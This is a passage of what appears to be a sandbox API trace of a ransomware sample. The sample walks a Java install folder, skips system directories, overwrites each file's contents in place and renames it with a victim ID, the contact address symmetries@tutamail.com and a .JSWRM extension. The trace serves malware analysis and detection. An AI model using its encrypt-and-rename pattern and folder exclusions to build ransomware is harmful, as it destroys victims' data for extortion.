CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunpkcs11.jar", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunpkcs11.jar", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunpkcs11.jar", lpUsedDefaultChar=0x0) returned 13 [0070.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0070.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0070.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0070.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0070.347] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.347] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=251327) returned 1 [0070.347] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.347] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.359] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.359] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.359] CloseHandle (hObject=0x458) returned 1 [0070.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0070.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0070.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0070.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0070.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0070.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f158 [0070.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.369] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0070.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0070.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0070.370] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10d3c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="zipfs.jar", cAlternateFileName="")) returned 1 [0070.370] lstrcmpiW (lpString1="zipfs.jar", lpString2=".") returned 1 [0070.370] lstrcmpiW (lpString1="zipfs.jar", lpString2="..") returned 1 [0070.370] lstrcmpiW (lpString1="zipfs.jar", lpString2="...") returned 1 [0070.370] lstrcmpiW (lpString1="zipfs.jar", lpString2="windows") returned 1 [0070.370] lstrcmpiW (lpString1="zipfs.jar", lpString2="recovery") returned 1 [0070.370] lstrcmpiW (lpString1="zipfs.jar", lpString2="perflogs") returned 1 [0070.370] lstrcmpiW (lpString1="zipfs.jar", lpString2="documents and settings") returned 1 [0070.370] lstrcmpiW (lpString1="zipfs.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.370] lstrcmpiW (lpString1="zipfs.jar", lpString2="system volume information") returned 1 [0070.370] lstrcmpiW (lpString1="zipfs.jar", lpString2="msocache") returned 1 [0070.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0070.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zipfs.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0070.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zipfs.jar", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zipfs.jar", lpUsedDefaultChar=0x0) returned 9 [0070.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0070.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0070.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zipfs.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0070.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zipfs.jar", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zipfs.jar", lpUsedDefaultChar=0x0) returned 9 [0070.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0070.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0070.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0070.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0070.371] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.371] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=68924) returned 1 [0070.371] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10d30) returned 0x24e1e0 [0070.371] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x10d30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x10d30, lpOverlapped=0x0) returned 1 [0070.377] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.377] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x10d30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x10d30, lpOverlapped=0x0) returned 1 [0070.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.378] CloseHandle (hObject=0x458) returned 1 [0070.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0070.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0070.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0070.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0070.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0070.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f5f8 [0070.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.378] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0070.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0070.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0070.379] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10d3c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="zipfs.jar", cAlternateFileName="")) returned 0 [0070.379] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0070.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0070.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0070.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0070.379] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="flavormap.properties", cAlternateFileName="FLAVOR~1.PRO")) returned 1 [0070.379] lstrcmpiW (lpString1="flavormap.properties", lpString2=".") returned 1 [0070.379] lstrcmpiW (lpString1="flavormap.properties", lpString2="..") returned 1 [0070.379] lstrcmpiW (lpString1="flavormap.properties", lpString2="...") returned 1 [0070.379] lstrcmpiW (lpString1="flavormap.properties", lpString2="windows") returned -1 [0070.379] lstrcmpiW (lpString1="flavormap.properties", lpString2="recovery") returned -1 [0070.379] lstrcmpiW (lpString1="flavormap.properties", lpString2="perflogs") returned -1 [0070.379] lstrcmpiW (lpString1="flavormap.properties", lpString2="documents and settings") returned 1 [0070.379] lstrcmpiW (lpString1="flavormap.properties", lpString2="$RECYCLE.BIN") returned 1 [0070.379] lstrcmpiW (lpString1="flavormap.properties", lpString2="system volume information") returned -1 [0070.379] lstrcmpiW (lpString1="flavormap.properties", lpString2="msocache") returned -1 [0070.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="flavormap.properties", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0070.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0070.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="flavormap.properties", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flavormap.properties", lpUsedDefaultChar=0x0) returned 20 [0070.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="flavormap.properties", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0070.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0070.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="flavormap.properties", cchWideChar=20, lpMultiByteStr=0x240ef8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flavormap.properties", lpUsedDefaultChar=0x0) returned 20 [0070.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0070.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0070.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0070.380] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.380] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3928) returned 1 [0070.380] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf50) returned 0x24d1d8 [0070.380] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0xf50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0xf50, lpOverlapped=0x0) returned 1 [0070.382] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.382] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0xf50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0xf50, lpOverlapped=0x0) returned 1 [0070.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.382] CloseHandle (hObject=0x454) returned 1 [0070.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0070.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0070.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0070.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0070.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.382] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0070.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0070.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0070.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0070.383] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xeba, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="fontconfig.bfc", cAlternateFileName="FONTCO~1.BFC")) returned 1 [0070.383] lstrcmpiW (lpString1="fontconfig.bfc", lpString2=".") returned 1 [0070.383] lstrcmpiW (lpString1="fontconfig.bfc", lpString2="..") returned 1 [0070.383] lstrcmpiW (lpString1="fontconfig.bfc", lpString2="...") returned 1 [0070.383] lstrcmpiW (lpString1="fontconfig.bfc", lpString2="windows") returned -1 [0070.383] lstrcmpiW (lpString1="fontconfig.bfc", lpString2="recovery") returned -1 [0070.383] lstrcmpiW (lpString1="fontconfig.bfc", lpString2="perflogs") returned -1 [0070.383] lstrcmpiW (lpString1="fontconfig.bfc", lpString2="documents and settings") returned 1 [0070.383] lstrcmpiW (lpString1="fontconfig.bfc", lpString2="$RECYCLE.BIN") returned 1 [0070.383] lstrcmpiW (lpString1="fontconfig.bfc", lpString2="system volume information") returned -1 [0070.383] lstrcmpiW (lpString1="fontconfig.bfc", lpString2="msocache") returned -1 [0070.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0070.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.bfc", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0070.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.bfc", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontconfig.bfc", lpUsedDefaultChar=0x0) returned 14 [0070.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0070.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0070.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.bfc", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0070.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.bfc", cchWideChar=14, lpMultiByteStr=0x345ef10, 